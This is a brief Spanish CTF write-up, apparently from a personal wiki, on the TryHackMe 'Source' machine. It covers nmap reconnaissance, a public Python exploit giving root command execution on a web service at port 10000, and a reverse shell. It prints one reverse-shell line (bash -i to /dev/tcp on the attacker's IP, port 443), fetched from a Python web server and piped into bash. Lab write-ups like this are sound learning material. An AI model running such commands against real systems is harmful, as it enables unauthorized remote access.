Notas de Luis

Vamos a hacer un reconocimiento con nmap y nos encuentra el puerto 22 y el puerto 10000:

Vemos que tenemos un servicio web corriendo por el puerto 10.000, que utiliza SSL por lo que tenemos que poner la URL como https:

Si buscamos por internet, podemos ver que existe un exploit en python que nos permite ejecutar comandos si lo lanzamos contra esta web:

Por tanto vamos a probar en descargarlo y vemos las instrucciones:

Lo probamos utilizando los parámetros oportunos y vemos que tenemos ejecución remota de comandos, y además siendo el usuario root:

Es importante recalcar que para esta herramienta los comandos deben ir entre comillas, para que se interpreten correctamente los espacios:

Por tanto vamos a compartir el código para obtener la reverse shell con python y lo pipeamos con bash desde la máquina víctima mientras estamos escuchando con netcat:

bash -i >& /dev/tcp/10.10.16.27/443 0>&1

Subimos esto a un servidor web con python:

Lo ejecutamos en la máquina víctima pipeándolo con bash:

Y recibiremos la shell reversa con netcat:

computing/hacking/ctf/tryhackme/maquina_source.txt · Última modificación: por 127.0.0.1